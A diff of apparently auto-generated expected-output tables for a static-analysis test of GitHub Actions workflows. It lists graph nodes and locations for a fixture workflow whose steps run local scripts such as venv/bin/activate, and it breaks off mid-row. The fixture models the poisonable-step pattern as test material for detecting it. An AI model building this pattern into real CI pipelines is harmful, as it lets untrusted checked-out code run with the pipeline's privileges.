.github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | 
.github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | 
+| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -576,47 +588,49 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python 
venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | 
@@ -695,43 +709,45 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . 
venv/bin/activate | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| 
.github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -750,6 +766,7 @@ dfNodes | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | usesIds | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | 
@@ -811,43 +828,45 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:24:43 | .github/workflows/poisonable_steps.yml@5:5:24:43 | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:29:43 | .github/workflows/poisonable_steps.yml@5:5:29:43 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:14:8:32 | .github/workflows/poisonable_steps.yml@8:14:8:32 | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:9:10:6 | .github/workflows/poisonable_steps.yml@9:9:10:6 | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:9:14:9:42 | .github/workflows/poisonable_steps.yml@9:14:9:42 | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:9:11:6 | .github/workflows/poisonable_steps.yml@10:9:11:6 | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:14:10:41 | .github/workflows/poisonable_steps.yml@10:14:10:41 | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:9:12:6 | .github/workflows/poisonable_steps.yml@11:9:12:6 | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:14:11:42 | .github/workflows/poisonable_steps.yml@11:14:11:42 | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:9:13:6 | .github/workflows/poisonable_steps.yml@12:9:13:6 | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:14:12:32 | .github/workflows/poisonable_steps.yml@12:14:12:32 | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:14:13:36 | .github/workflows/poisonable_steps.yml@13:14:13:36 | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:14:14:44 | .github/workflows/poisonable_steps.yml@14:14:14:44 | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:14:15:56 | .github/workflows/poisonable_steps.yml@15:14:15:56 | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:14:16:56 | .github/workflows/poisonable_steps.yml@16:14:16:56 | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:14:17:40 | .github/workflows/poisonable_steps.yml@17:14:17:40 | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:14:18:50 | .github/workflows/poisonable_steps.yml@18:14:18:50 | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:14:19:29 | .github/workflows/poisonable_steps.yml@19:14:19:29 | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip 
install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:14:20:73 | .github/workflows/poisonable_steps.yml@20:14:20:73 | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | -| 
.github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:9:24:43 | .github/workflows/poisonable_steps.yml@24:9:24:43 | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:14:24:42 | .github/workflows/poisonable_steps.yml@24:14:24:42 | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | 
